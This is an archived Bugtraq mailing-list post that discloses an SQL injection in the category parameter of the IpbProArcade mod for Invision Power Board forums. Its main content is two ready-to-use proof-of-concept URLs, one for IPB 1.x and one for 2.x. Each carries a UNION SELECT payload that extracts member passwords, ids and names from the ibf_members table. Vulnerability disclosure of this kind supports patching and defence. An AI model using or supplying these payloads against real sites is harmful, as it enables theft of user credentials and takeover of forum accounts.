[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    IpbProArace 2.5.x SQL injection.
From:       axl daivy <axlownz () gmail ! com>
Date:       2004-11-20 20:05:53
Message-ID: 20041120200553.4085.qmail () www ! securityfocus ! com
[Download RAW message or body]



i have found an sql injection in the popular ipbproarcade mod for ipb systems (1.x \
and 2.x)

the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the entire \
forum system

p.o.c

for ipb 1.x

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*


for ipb 2.x

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*


discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon

cheers
Axl


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic